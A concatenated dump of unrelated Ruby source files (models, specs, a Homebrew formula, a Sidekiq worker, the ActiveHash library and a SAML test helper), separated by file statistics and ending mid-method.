\ 'JAVA_OPTS="$JAVA_OPTS $CALCULATED_MEMORY"') end end class StubOpenJDKLike < JavaBuildpack::Jre::OpenJDKLike public :command, :sub_components def supports? super end end def sub_configuration_context(configuration) c = context.clone c[:configuration] = configuration c end
37.377358
120
0.697375
8771d29843e3f087fabf4547acf41f1adeb79ebd
551
module Pageflow
  class Account < ActiveRecord::Base
    include FeatureTarget

    has_many :users
    has_many :entries
    has_many :folders
    has_many :themings

    belongs_to :default_theming, :class_name => 'Theming'

    validates :default_theming, :presence => true

    accepts_nested_attributes_for :default_theming, :update_only => true

    scope :with_landing_page, -> { where.not(:landing_page_name => '') }

    def build_default_theming(*args)
      super.tap do |theming|
        theming.account = self
      end
    end
  end
end
22.04
72
0.689655
b94460edd165215420690e451183e2f8726552bb
2693
class Libmemcached < Formula
  desc "C and C++ client library to the memcached server"
  homepage "https://libmemcached.org/"
  url "https://launchpad.net/libmemcached/1.0/1.0.18/+download/libmemcached-1.0.18.tar.gz"
  sha256 "e22c0bb032fde08f53de9ffbc5a128233041d9f33b5de022c0978a2149885f82"
  revision 2

  bottle do
    cellar :any
    sha256 "0c7902542fe3b047ce0a512296b1ec3e0da3d731fef0cbd5143152ce17d8f778" => :mojave
    sha256 "351ec4bceab1983a0523739f241c7b3dfb5c9c4c98fe04ae89533de71e0d462b" => :high_sierra
    sha256 "f0fc1410caf2e9bfa130c52758a3d3a98a34032fe3d37a20980ab219042b6487" => :sierra
    sha256 "7b2540dda66e3de1be0603aafa10a18a006768f698a7db289c380235dad109a3" => :el_capitan
    sha256 "4e7e0cfb8f4d8f31e36c23b545ad3b0153c2f6d99645abf603f7e9f1ed427296" => :yosemite
  end

  depends_on "memcached"

  # https://bugs.launchpad.net/libmemcached/+bug/1245562
  patch do
    url "https://raw.githubusercontent.com/Homebrew/formula-patches/60f3532/libmemcached/1.0.18.patch"
    sha256 "592f10fac729bd2a2b79df26086185d6e08f8667cb40153407c08d4478db89fb"
  end

  def install
    system "./configure", "--prefix=#{prefix}"
    system "make", "install"
  end

  test do
    (testpath/"test.c").write <<~EOS
      #include <assert.h>
      #include <string.h>
      #include <libmemcached-1.0/memcached.h>

      int main(int argc, char **argv) {
        const char *conf = "--SERVER=localhost:11211";
        memcached_st *memc = memcached(conf, strlen(conf));
        assert(memc != NULL);

        // Add a value.
        const char *key = "key";
        const char *val = "val";
        assert(memcached_add(memc, key, strlen(key), val, strlen(val), (time_t)0, (uint32_t)0) == MEMCACHED_SUCCESS);

        // Fetch and check the added value.
        size_t return_val_len;
        uint32_t return_flags;
        memcached_return_t error;
        char *return_val = memcached_get(memc, key, strlen(key), &return_val_len, &return_flags, &error);
        assert(return_val != NULL);
        assert(error == MEMCACHED_SUCCESS);
        assert(return_val_len == strlen(val));
        assert(strncmp(return_val, val, return_val_len) == 0);
        assert(return_flags == 0);
        free(return_val);

        memcached_free(memc);
      }
    EOS
    system ENV.cc, "-I#{include}", "-L#{lib}", "-lmemcached", "test.c", "-o", "test"

    memcached = Formula["memcached"].bin/"memcached"
    # Assumes port 11211 is not already taken
    io = IO.popen("#{memcached} --listen=localhost:11211")
    sleep 1

    system "./test"
    Process.kill "TERM", io.pid
  end
end
36.391892
102
0.658002
bb97e1276554217993b5e0b2c8dedee7c07f09cf
117
class DropTurnsFromGames < ActiveRecord::Migration[5.1]
  def change
    remove_column :games, :turn_count
  end
end
19.5
55
0.760684
6abfd8f6d717e4e2cb08323d25c2c911aa2d9063
4901
=begin #Selling Partner API for Direct Fulfillment Inventory Updates #The Selling Partner API for Direct Fulfillment Inventory Updates provides programmatic access to a direct fulfillment vendor's inventory updates. OpenAPI spec version: v1 Generated by: https://github.com/swagger-api/swagger-codegen.git Swagger Codegen version: 3.0.33 =end # load the gem require 'vendor-direct-fulfillment-inventory-api-model' # The following was generated by the `rspec --init` command. Conventionally, all # specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`. # The generated `.rspec` file contains `--require spec_helper` which will cause # this file to always be loaded, without a need to explicitly require it in any # files. # # Given that it is always loaded, you are encouraged to keep this file as # light-weight as possible. Requiring heavyweight dependencies from this file # will add to the boot time of your test suite on EVERY test run, even for an # individual file that may not need all of that loaded. Instead, consider making # a separate helper file that requires the additional dependencies and performs # the additional setup, and require it from the spec files that actually need # it. # # The `.rspec` file also contains a few flags that are not defaults but that # users commonly want. # # See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration RSpec.configure do |config| # rspec-expectations config goes here. You can use an alternate # assertion/expectation library such as wrong or the stdlib/minitest # assertions if you prefer. config.expect_with :rspec do |expectations| # This option will default to `true` in RSpec 4. It makes the `description` # and `failure_message` of custom matchers include text for helper methods # defined using `chain`, e.g.: # be_bigger_than(2).and_smaller_than(4).description # # => "be bigger than 2 and smaller than 4" # ...rather than: # # => "be bigger than 2" expectations.include_chain_clauses_in_custom_matcher_descriptions = true end # rspec-mocks config goes here. You can use an alternate test double # library (such as bogus or mocha) by changing the `mock_with` option here. config.mock_with :rspec do |mocks| # Prevents you from mocking or stubbing a method that does not exist on # a real object. This is generally recommended, and will default to # `true` in RSpec 4. mocks.verify_partial_doubles = true end # The settings below are suggested to provide a good initial experience # with RSpec, but feel free to customize to your heart's content. =begin # These two settings work together to allow you to limit a spec run # to individual examples or groups you care about by tagging them with # `:focus` metadata. When nothing is tagged with `:focus`, all examples # get run. config.filter_run :focus config.run_all_when_everything_filtered = true # Allows RSpec to persist some state between runs in order to support # the `--only-failures` and `--next-failure` CLI options. We recommend # you configure your source control system to ignore this file. config.example_status_persistence_file_path = "spec/examples.txt" # Limits the available syntax to the non-monkey patched syntax that is # recommended. For more details, see: # - http://rspec.info/blog/2012/06/rspecs-new-expectation-syntax/ # - http://www.teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/ # - http://rspec.info/blog/2014/05/notable-changes-in-rspec-3/#zero-monkey-patching-mode config.disable_monkey_patching! # This setting enables warnings. 
It's recommended, but in some cases may # be too noisy due to issues in dependencies. config.warnings = true # Many RSpec users commonly either run the entire suite or an individual # file, and it's useful to allow more verbose output when running an # individual spec file. if config.files_to_run.one? # Use the documentation formatter for detailed output, # unless a formatter has already been configured # (e.g. via a command-line flag). config.default_formatter = 'doc' end # Print the 10 slowest examples and example groups at the # end of the spec run, to help surface which specs are running # particularly slow. config.profile_examples = 10 # Run specs in random order to surface order dependencies. If you find an # order dependency and want to debug it, you can fix the order by providing # the seed, which is printed after each run. # --seed 1234 config.order = :random # Seed global randomization in this process using the `--seed` CLI option. # Setting this allows you to use `--seed` to deterministically reproduce # test failures related to randomization by passing the same `--seed` value # as the one that triggered the failure. Kernel.srand config.seed =end end
44.153153
146
0.747194
1c30180a3c1b6e697010f0ec7b600db1944ee85f
1147
# Copyright 2014 Square Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# Worker that recalculates readiness for a Key's ancestors, namely:
# - {Commit Commits}
# - {Article Article}.
class KeyAncestorsRecalculator
  include Sidekiq::Worker
  sidekiq_options queue: :low

  # Executes this worker.
  #
  # @param [Fixnum] key_id The ID of a Key.
  def perform(key_id)
    key = Key.find(key_id)

    key.article.try!(:recalculate_ready!)

    CommitsKey.where(key_id: key_id).pluck(:commit_id).each do |commit_id|
      CommitRecalculator.perform_once commit_id.to_i
    end
  end

  include SidekiqLocking
end
30.184211
77
0.721883
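A usage sketch for the worker above; it assumes Sidekiq is configured and that a Key record (here called key) exists.

# Enqueue asynchronously (Sidekiq::Worker provides perform_async):
KeyAncestorsRecalculator.perform_async(key.id)

# Or run inline, e.g. from a console or a test:
KeyAncestorsRecalculator.new.perform(key.id)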
0826ce790248e221792093b89c055f3fd52020ca
4839
module Workflow::Addon module Branch extend ActiveSupport::Concern extend SS::Addon included do attr_accessor :in_branch define_model_callbacks :merge_branch field :master_id, type: Integer belongs_to :master, foreign_key: "master_id", class_name: self.to_s has_many :branches, foreign_key: "master_id", class_name: self.to_s, dependent: :destroy permit_params :master_id validate :validate_master_lock, if: ->{ branch? } before_save :seq_clone_filename, if: ->{ new_clone? && basename.blank? } after_save :merge_to_master define_method(:master?) { master.blank? } define_method(:branch?) { master.present? } end def new_clone? @new_clone == true end def cloned_name? prefix = I18n.t("workflow.cloned_name_prefix") name =~ /^\[#{::Regexp.escape(prefix)}\]/ end def new_clone(attributes = {}) attributes = self.attributes.merge(attributes).select { |k| self.fields.key?(k) } self.fields.select { |n, v| (v.options.dig(:metadata, :branch) == false) }.each do |n, v| attributes.delete(n) end item = self.class.new(attributes) item.id = nil item.state = "closed" item.cur_user = @cur_user item.cur_site = @cur_site item.cur_node = @cur_node if attributes[:filename].nil? item.filename = "#{dirname}/" item.basename = "" end item.workflow_user_id = nil item.workflow_state = nil item.workflow_comment = nil item.workflow_approvers = nil item.workflow_required_counts = nil if item.is_a?(Cms::Addon::EditLock) item.lock_owner_id = nil item.lock_until = nil end if item.is_a?(Cms::Addon::Form::Page) item.copy_column_values(self) end item.instance_variable_set(:@new_clone, true) item end def clone_files run_callbacks(:clone_files) do ids = {} files.each do |f| ids[f.id] = clone_file(f).id end self.file_ids = ids.values ids end end def clone_file(f) attributes = Hash[f.attributes] attributes.select!{ |k| f.fields.key?(k) } file = SS::File.new(attributes) file.id = nil file.in_file = f.uploaded_file file.user_id = @cur_user.id if @cur_user file.save validate: false if respond_to?(:html) && html.present? html = self.html html.gsub!("=\"#{f.url}\"", "=\"#{file.url}\"") html.gsub!("=\"#{f.thumb_url}\"", "=\"#{file.thumb_url}\"") self.html = html end if respond_to?(:body_parts) && body_parts.present? self.body_parts = body_parts.map do |html| html = html.to_s html = html.gsub("=\"#{f.url}\"", "=\"#{file.url}\"") html = html.gsub("=\"#{f.thumb_url}\"", "=\"#{file.thumb_url}\"") html end end file end def clone_thumb run_callbacks(:clone_thumb) do return if thumb.blank? self.thumb = clone_file(thumb) thumb end end # backwards compatibility def merge(branch) Rails.logger.warn( 'DEPRECATION WARNING:' \ ' merge is deprecated and will be removed in future version (user merge_branch instead).' ) self.in_branch = branch self.merge_branch end def merge_branch return unless in_branch run_callbacks(:merge_branch) do self.reload attributes = {} in_branch_attributes = in_branch.attributes.to_h self.fields.each do |k, v| next if k == "_id" next if k == "filename" next if v.options.dig(:metadata, :branch) == false attributes[k] = in_branch_attributes[k] end self.attributes = attributes self.master_id = nil self.allow_other_user_files if respond_to?(:allow_other_user_files) end self.save end def merge_to_master return unless branch? return unless state == "public" master = self.master master.cur_user = @cur_user master.cur_site = @cur_site master.in_branch = self master.merge_branch master.generate_file end private def serve_static_file? return false if branch? super end def validate_filename super unless new_clone? 
end def seq_clone_filename self.filename ||= "" self.filename = dirname ? "#{dirname}#{id}.html" : "#{id}.html" end def validate_master_lock return if !master.respond_to?("locked?") return if self.state != "public" if master.locked? && !master.lock_owned?(@cur_user) errors.add :base, :locked, user: master.lock_owner.long_name end end end end
25.335079
97
0.598884
edc5c31d6fc2dd2613fd87c631acaf513d6e046a
2998
require 'rails_helper' RSpec.describe Api::V1::TourPointsController, :type => :controller do render_views describe "POST create" do let!(:user) { FactoryBot.create :pro_user } let!(:tour) { FactoryBot.create :tour } let!(:tour_point) { FactoryBot.build :tour_point } context "within existing tour" do before { post 'create', params: { tour_id: tour.id, token: user.token, tour_points: [{latitude: tour_point.latitude, longitude: tour_point.longitude, passing_time: tour_point.passing_time.iso8601(3)}], :format => :json } } it { expect(response.status).to eq(201) } it { expect(JSON.parse(response.body)).to eq({"status"=>"ok"}) } end context "tour has no location" do before { post 'create', params: { tour_id: tour.id, token: user.token, tour_points: [{latitude: tour_point.latitude, longitude: tour_point.longitude, passing_time: tour_point.passing_time.iso8601(3)}], :format => :json } } it { expect(tour.reload.longitude).to eq(tour_point.longitude) } it { expect(tour.reload.latitude).to eq(tour_point.latitude) } end context "tour has location" do let!(:tour_with_location) { FactoryBot.create(:tour, latitude: 2, longitude: 3) } before { post 'create', params: { tour_id: tour_with_location.id, token: user.token, tour_points: [{latitude: tour_point.latitude, longitude: tour_point.longitude, passing_time: tour_point.passing_time.iso8601(3)}], :format => :json } } it { expect(tour_with_location.reload.longitude).to eq(3.0) } it { expect(tour_with_location.reload.latitude).to eq(2.0) } end context "with multiple tour points" do before { post 'create', params: { tour_id: tour.id, token: user.token, tour_points: [{latitude: tour_point.latitude, longitude: tour_point.longitude, passing_time: tour_point.passing_time.iso8601(3)}, {latitude: tour_point.latitude, longitude: tour_point.longitude, passing_time: tour_point.passing_time.iso8601(3)}], :format => :json } } it { expect(response.status).to eq(201) } it { expect(JSON.parse(response.body)).to eq({"status"=>"ok"}) } end context "with inexisting tour" do it { expect { post 'create', params: { tour_id: 0, token: user.token, tour_points: [{latitude: tour_point.latitude, longitude: tour_point.longitude, passing_time: tour_point.passing_time}], :format => :json } }.to raise_error(ActiveRecord::RecordNotFound) } end context "with invalid tour_point" do before { post 'create', params: { tour_id: tour.id, token: user.token, tour_points: [{latitude: "ABC", longitude: "DEF", passing_time: "GHI"}], :format => :json } } it { expect(response.status).to eq(400) } end context "with missing passing time" do it "raises exception" do expect { post 'create', params: { tour_id: tour.id, token: user.token, tour_points: {latitude: "ABC", longitude: "DEF"} } }.to raise_error end end end end
52.596491
344
0.679787
87b4383fa959934e83421341784d3c398513e517
1176
require 'fog/ecloud/models/compute/template'

module Fog
  module Compute
    class Ecloud
      class Templates < Fog::Ecloud::Collection

        identity :href

        model Fog::Compute::Ecloud::Template

        def all
          r_data = []
          data = connection.get_templates(href).body[:Families]
          data[:Family].is_a?(Hash) ? data = [data[:Family]] : data = data[:Family]
          data.each do |d|
            d[:Categories][:Category].each do |cat|
              cat[:OperatingSystems][:OperatingSystem].is_a?(Hash) ? cat = [cat[:OperatingSystems][:OperatingSystem]] : cat = cat[:OperatingSystems][:OperatingSystem]
              cat.each do |os|
                os[:Templates][:Template].is_a?(Hash) ? os = [os[:Templates][:Template]] : os = os[:Templates][:Template]
                os.each do |template|
                  r_data << template
                end
              end
            end
          end
          load(r_data)
        end

        def get(uri)
          if data = connection.get_template(uri)
            new(data.body)
          end
        rescue Fog::Errors::NotFound
          nil
        end
      end
    end
  end
end
28.682927
166
0.535714
3827053c7bd36c28f7f11563559ecd15f58a1c51
562
# frozen_string_literal: false
# = uri/wss.rb
#
# Author:: Matt Muller <[email protected]>
# License:: You can redistribute it and/or modify it under the same term as Ruby.
#
# See Bundler::URI for general documentation
#

require_relative 'ws'

module Bundler::URI

  # The default port for WSS URIs is 443, and the scheme is 'wss:' rather
  # than 'ws:'. Other than that, WSS URIs are identical to WS URIs;
  # see Bundler::URI::WS.
  class WSS < WS
    # A Default port of 443 for Bundler::URI::WSS
    DEFAULT_PORT = 443
  end
  @@schemes['WSS'] = WSS
end
24.434783
81
0.692171
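A small sketch of what the class above provides once Bundler's vendored URI is loaded; the require path is an assumption about Bundler's internal layout.

require 'bundler/vendored_uri'  # assumed entry point that defines Bundler::URI

uri = Bundler::URI.parse('wss://example.com/chat')
uri.class   # => Bundler::URI::WSS (registered via @@schemes['WSS'])
uri.port    # => 443, from DEFAULT_PORT when the URI names no port
uri.scheme  # => "wss"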
7a65cd6d88ecb1456b75a757428b103ab6e8c7b9
13266
module ActiveHash class RecordNotFound < StandardError end class ReservedFieldError < StandardError end class IdError < StandardError end class FileTypeMismatchError < StandardError end class Base class_attribute :_data, :dirty, :default_attributes class WhereChain def initialize(scope) @scope = scope @records = @scope.all end def not(options) return @records if options.blank? # use index if searching by id if options.key?(:id) || options.key?("id") ids = @scope.pluck(:id) - Array.wrap(options.delete(:id) || options.delete("id")) candidates = ids.map { |id| @scope.find_by_id(id) }.compact end return candidates if options.blank? (candidates || @records || []).reject do |record| match_options?(record, options) end end def match_options?(record, options) options.all? do |col, match| if match.kind_of?(Array) match.any? { |v| normalize(v) == normalize(record[col]) } else normalize(record[col]) == normalize(match) end end end private :match_options? def normalize(v) v.respond_to?(:to_sym) ? v.to_sym : v end private :normalize end if Object.const_defined?(:ActiveModel) extend ActiveModel::Naming include ActiveModel::Conversion else def to_param id.present? ? id.to_s : nil end end class << self def cache_key if Object.const_defined?(:ActiveModel) model_name.cache_key else ActiveSupport::Inflector.tableize(self.name).downcase end end def primary_key "id" end def field_names @field_names ||= [] end def the_meta_class class << self self end end def compute_type(type_name) self end def pluralize_table_names true end def empty? false end def data _data end def data=(array_of_hashes) mark_dirty @records = nil reset_record_index self._data = array_of_hashes if array_of_hashes auto_assign_fields(array_of_hashes) array_of_hashes.each do |hash| insert new(hash) end end end def exists?(record) if record.id.present? record_index[record.id.to_s].present? end end def insert(record) @records ||= [] record[:id] ||= next_id validate_unique_id(record) if dirty mark_dirty add_to_record_index({ record.id.to_s => @records.length }) @records << record end def next_id max_record = all.max { |a, b| a.id <=> b.id } if max_record.nil? 1 elsif max_record.id.is_a?(Numeric) max_record.id.succ end end def record_index @record_index ||= {} end private :record_index def reset_record_index record_index.clear end private :reset_record_index def add_to_record_index(entry) record_index.merge!(entry) end private :add_to_record_index def validate_unique_id(record) raise IdError.new("Duplicate ID found for record #{record.attributes.inspect}") if record_index.has_key?(record.id.to_s) end private :validate_unique_id def create(attributes = {}) record = new(attributes) record.save mark_dirty record end alias_method :add, :create def create!(attributes = {}) record = new(attributes) record.save! record end def all(options={}) if options.has_key?(:conditions) where(options[:conditions]) else @records ||= [] end end def where(options = :chain) if options == :chain return WhereChain.new(self) elsif options.blank? return @records end # use index if searching by id if options.key?(:id) || options.key?("id") ids = (options.delete(:id) || options.delete("id")) candidates = Array.wrap(ids).map { |id| find_by_id(id) }.compact end return candidates if options.blank? (candidates || @records || []).select do |record| match_options?(record, options) end end def find_by(options) where(options).first end def find_by!(options) find_by(options) || (raise RecordNotFound.new("Couldn't find #{name}")) end def match_options?(record, options) options.all? 
do |col, match| if match.kind_of?(Array) match.any? { |v| normalize(v) == normalize(record[col]) } else normalize(record[col]) == normalize(match) end end end private :match_options? def normalize(v) v.respond_to?(:to_sym) ? v.to_sym : v end private :normalize def count all.length end def pluck(*column_names) column_names.map { |column_name| all.map(&column_name.to_sym) }.inject(&:zip) end def transaction yield rescue LocalJumpError => err raise err rescue StandardError => e unless Object.const_defined?(:ActiveRecord) && e.is_a?(ActiveRecord::Rollback) raise e end end def delete_all mark_dirty reset_record_index @records = [] end def find(id, * args) case id when nil nil when :all all when :first all(*args).first when Array id.map { |i| find(i) } else find_by_id(id) || begin raise RecordNotFound.new("Couldn't find #{name} with ID=#{id}") end end end def find_by_id(id) index = record_index[id.to_s] index and @records[index] end delegate :first, :last, :to => :all def fields(*args) options = args.extract_options! args.each do |field| field(field, options) end end def field(field_name, options = {}) validate_field(field_name) field_names << field_name add_default_value(field_name, options[:default]) if options[:default] define_getter_method(field_name, options[:default]) define_setter_method(field_name) define_interrogator_method(field_name) define_custom_find_method(field_name) define_custom_find_all_method(field_name) end def validate_field(field_name) if [:attributes].include?(field_name.to_sym) raise ReservedFieldError.new("#{field_name} is a reserved field in ActiveHash. Please use another name.") end end private :validate_field def respond_to?(method_name, include_private=false) super || begin config = configuration_for_custom_finder(method_name) config && config[:fields].all? do |field| field_names.include?(field.to_sym) || field.to_sym == :id end end end def method_missing(method_name, *args) return super unless respond_to? method_name config = configuration_for_custom_finder(method_name) attribute_pairs = config[:fields].zip(args) matches = all.select { |base| attribute_pairs.all? { |field, value| base.send(field).to_s == value.to_s } } if config[:all?] matches else result = matches.first if config[:bang?] result || raise(RecordNotFound, "Couldn\'t find #{name} with #{attribute_pairs.collect { |pair| "#{pair[0]} = #{pair[1]}" }.join(', ')}") else result end end end def configuration_for_custom_finder(finder_name) if finder_name.to_s.match(/^find_(all_)?by_(.*?)(!)?$/) && !($1 && $3) { :all? => !!$1, :bang? => !!$3, :fields => $2.split('_and_') } end end private :configuration_for_custom_finder def add_default_value field_name, default_value self.default_attributes ||= {} self.default_attributes[field_name] = default_value end def define_getter_method(field, default_value) unless instance_methods.include?(field.to_sym) define_method(field) do attributes[field].nil? ? default_value : attributes[field] end end end private :define_getter_method def define_setter_method(field) method_name = :"#{field}=" unless instance_methods.include?(method_name) define_method(method_name) do |new_val| @attributes[field] = new_val end end end private :define_setter_method def define_interrogator_method(field) method_name = :"#{field}?" unless instance_methods.include?(method_name) define_method(method_name) do send(field).present? 
end end end private :define_interrogator_method def define_custom_find_method(field_name) method_name = :"find_by_#{field_name}" unless singleton_methods.include?(method_name) the_meta_class.instance_eval do define_method(method_name) do |*args| args.extract_options! identifier = args[0] all.detect { |record| record.send(field_name) == identifier } end end end end private :define_custom_find_method def define_custom_find_all_method(field_name) method_name = :"find_all_by_#{field_name}" unless singleton_methods.include?(method_name) the_meta_class.instance_eval do unless singleton_methods.include?(method_name) define_method(method_name) do |*args| args.extract_options! identifier = args[0] all.select { |record| record.send(field_name) == identifier } end end end end end private :define_custom_find_all_method def auto_assign_fields(array_of_hashes) (array_of_hashes || []).inject([]) do |array, row| row.symbolize_keys! row.keys.each do |key| unless key.to_s == "id" array << key end end array end.uniq.each do |key| field key end end private :auto_assign_fields # Needed for ActiveRecord polymorphic associations def base_class ActiveHash::Base end # Needed for ActiveRecord polymorphic associations(rails/rails#32148) def polymorphic_name base_class.name end def reload reset_record_index self.data = _data mark_clean end private :reload def mark_dirty self.dirty = true end private :mark_dirty def mark_clean self.dirty = false end private :mark_clean end def initialize(attributes = {}) attributes.symbolize_keys! @attributes = attributes attributes.dup.each do |key, value| send "#{key}=", value end yield self if block_given? end def attributes if self.class.default_attributes (self.class.default_attributes.merge @attributes).freeze else @attributes end end def [](key) attributes[key] end def _read_attribute(key) attributes[key] end alias_method :read_attribute, :_read_attribute def []=(key, val) @attributes[key] = val end def id attributes[:id] ? attributes[:id] : nil end def id=(id) @attributes[:id] = id end alias quoted_id id def new_record? !self.class.all.include?(self) end def destroyed? false end def persisted? self.class.all.map(&:id).include?(id) end def readonly? true end def eql?(other) other.instance_of?(self.class) and not id.nil? and (id == other.id) end alias == eql? def hash id.hash end def cache_key case when new_record? "#{self.class.cache_key}/new" when timestamp = self[:updated_at] "#{self.class.cache_key}/#{id}-#{timestamp.to_s(:number)}" else "#{self.class.cache_key}/#{id}" end end def errors obj = Object.new def obj.[](key) [] end def obj.full_messages() [] end obj end def save(*args) unless self.class.exists?(self) self.class.insert(self) end true end alias save! save def valid? true end def marked_for_destruction? false end end end
22.833046
149
0.566637
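A minimal usage sketch for ActiveHash::Base above, assuming the active_hash gem and its ActiveSupport dependency are loaded; the Country class and its data are invented for illustration.

class Country < ActiveHash::Base
  self.data = [
    { id: 1, name: 'US',     currency: 'USD' },
    { id: 2, name: 'Canada', currency: 'CAD' }
  ]
end

Country.find(1).name                       # => "US"
Country.find_by_name('Canada')             # custom finder generated per field
Country.where(currency: 'USD').map(&:id)   # => [1]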
39dc66ed56005e04433cc0bc017df64d961c25f1
910
module StubApiRequestHelper
  class MissingFixtureError < StandardError
  end

  REQUEST_HEADERS = {
    'Accept' =>'application/json',
    'Authorization' =>'Basic a2F0YW5hOnNlY3JldA==',
    'Content-Type' =>'application/json'
  }.freeze

  def stub_api_request(verb, path, options = {})
    file_name = options.delete(:fixture) || "#{verb}-#{path}"
    file_path = File.join("spec", "fixtures", "responses", "#{file_name}.json")

    unless File.exist?(file_path)
      raise MissingFixtureError, "#{file_name} not found. Did you forget to create #{file_path}"
    end

    body_file = File.read(file_path)
    body_json = JSON.parse(body_file) # parsed only so a malformed fixture fails fast

    code = verb == :post ? 201 : 200

    stub_request(verb, "https://api.sandbox.evvnt.com/#{path}.json").
      with(headers: REQUEST_HEADERS, query: options[:params]).
      to_return(status: code, body: body_file, headers: {})
  end
end
35
79
0.654945
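A hypothetical spec using the helper above; it assumes WebMock provides stub_request and that a fixture exists at spec/fixtures/responses/get-events.json.

RSpec.describe 'Evvnt events API' do
  include StubApiRequestHelper

  it 'stubs the listing endpoint' do
    stub_api_request(:get, 'events', params: { venue_id: 1 })
    # the code under test can now GET https://api.sandbox.evvnt.com/events.json?venue_id=1
  end
end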
2673a066fc429a6dd8e78c361a87a80d37078dbc
991
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/google_ads/v1/enums/brand_safety_suitability.proto

require 'google/protobuf'

require 'google/api/annotations_pb'

Google::Protobuf::DescriptorPool.generated_pool.build do
  add_message "google.ads.googleads.v1.enums.BrandSafetySuitabilityEnum" do
  end
  add_enum "google.ads.googleads.v1.enums.BrandSafetySuitabilityEnum.BrandSafetySuitability" do
    value :UNSPECIFIED, 0
    value :UNKNOWN, 1
    value :EXPANDED_INVENTORY, 2
    value :STANDARD_INVENTORY, 3
    value :LIMITED_INVENTORY, 4
  end
end

module Google::Ads::GoogleAds::V1::Enums
  BrandSafetySuitabilityEnum = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v1.enums.BrandSafetySuitabilityEnum").msgclass
  BrandSafetySuitabilityEnum::BrandSafetySuitability = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v1.enums.BrandSafetySuitabilityEnum.BrandSafetySuitability").enummodule
end
43.086957
203
0.816347
5d4cc65157a5fc83f77807070ca3a6232b4f8176
8126
require 'saml_idp_constants' ## GET /api/saml/auth helper methods module SamlAuthHelper def saml_settings settings = OneLogin::RubySaml::Settings.new # SP settings settings.assertion_consumer_service_url = 'http://localhost:3000/test/saml/decode_assertion' settings.assertion_consumer_logout_service_url = 'http://localhost:3000/test/saml/decode_slo_request' settings.certificate = saml_test_sp_cert settings.private_key = saml_test_sp_key settings.authn_context = Saml::Idp::Constants::IAL1_AUTHN_CONTEXT_CLASSREF # SP + IdP Settings settings.issuer = 'http://localhost:3000' settings.security[:authn_requests_signed] = true settings.security[:logout_requests_signed] = true settings.security[:embed_sign] = true settings.security[:digest_method] = 'http://www.w3.org/2001/04/xmlenc#sha256' settings.security[:signature_method] = 'http://www.w3.org/2001/04/xmldsig-more#rsa-sha256' settings.name_identifier_format = 'urn:oasis:names:tc:SAML:2.0:nameid-format:persistent' settings.double_quote_xml_attribute_values = true # IdP setting settings.idp_sso_target_url = "http://#{Figaro.env.domain_name}/api/saml/auth2019" settings.idp_slo_target_url = "http://#{Figaro.env.domain_name}/api/saml/logout2019" settings.idp_cert_fingerprint = idp_fingerprint settings.idp_cert_fingerprint_algorithm = 'http://www.w3.org/2001/04/xmlenc#sha256' settings end def sp_fingerprint @sp_fingerprint ||= Fingerprinter.fingerprint_cert( OpenSSL::X509::Certificate.new(saml_test_sp_cert), ) end def idp_fingerprint @idp_fingerprint ||= Fingerprinter.fingerprint_cert( OpenSSL::X509::Certificate.new(saml_test_idp_cert), ) end def saml_test_sp_key @private_key ||= OpenSSL::PKey::RSA.new( File.read(Rails.root + 'keys/saml_test_sp.key'), ).to_pem end def saml_test_idp_cert @saml_test_idp_cert ||= File.read(Rails.root.join('certs', 'saml2019.crt')) end def saml_test_sp_cert @saml_test_sp_cert ||= File.read(Rails.root.join('certs', 'sp', 'saml_test_sp.crt')) end def auth_request @auth_request ||= OneLogin::RubySaml::Authrequest.new end def authnrequest_get auth_request.create(saml_spec_settings) end def saml_spec_settings settings = saml_settings.dup settings.issuer = 'http://localhost:3000' settings end def invalid_authn_context_settings settings = saml_settings.dup settings.authn_context = 'http://idmanagement.gov/ns/assurance/loa/5' settings end def invalid_service_provider_settings settings = saml_settings.dup settings.issuer = 'invalid_provider' settings end def invalid_service_provider_and_authn_context_settings settings = saml_settings.dup settings.authn_context = 'http://idmanagement.gov/ns/assurance/loa/5' settings.issuer = 'invalid_provider' settings end def sp1_saml_settings settings = saml_settings.dup settings.issuer = 'https://rp1.serviceprovider.com/auth/saml/metadata' settings end def sp2_saml_settings settings = saml_settings.dup settings.issuer = 'https://rp2.serviceprovider.com/auth/saml/metadata' settings end def email_nameid_saml_settings_for_allowed_issuer settings = saml_settings.dup settings.name_identifier_format = 'urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress' settings.issuer = 'https://rp1.serviceprovider.com/auth/saml/metadata' settings end def email_nameid_saml_settings_for_disallowed_issuer settings = saml_settings.dup settings.name_identifier_format = 'urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress' settings end def ial2_saml_settings settings = sp1_saml_settings.dup settings.authn_context = Saml::Idp::Constants::IAL2_AUTHN_CONTEXT_CLASSREF settings end def loa3_saml_settings settings = 
sp1_saml_settings.dup settings.authn_context = Saml::Idp::Constants::LOA3_AUTHN_CONTEXT_CLASSREF settings end def ial2_with_bundle_saml_settings settings = ial2_saml_settings settings.authn_context = [ settings.authn_context, "#{Saml::Idp::Constants::REQUESTED_ATTRIBUTES_CLASSREF}first_name:last_name email, ssn", "#{Saml::Idp::Constants::REQUESTED_ATTRIBUTES_CLASSREF}phone", ] settings end def loa3_with_bundle_saml_settings settings = loa3_saml_settings settings.authn_context = [ settings.authn_context, "#{Saml::Idp::Constants::REQUESTED_ATTRIBUTES_CLASSREF}first_name:last_name email, ssn", "#{Saml::Idp::Constants::REQUESTED_ATTRIBUTES_CLASSREF}phone", ] settings end def ial1_with_bundle_saml_settings settings = sp1_saml_settings settings.authn_context = [ settings.authn_context, "#{Saml::Idp::Constants::REQUESTED_ATTRIBUTES_CLASSREF}first_name:last_name email, ssn", "#{Saml::Idp::Constants::REQUESTED_ATTRIBUTES_CLASSREF}phone", ] settings end def sp1_authnrequest auth_request.create(sp1_saml_settings) end def sp2_authnrequest auth_request.create(sp2_saml_settings) end def ial2_authnrequest auth_request.create(ial2_saml_settings) end def 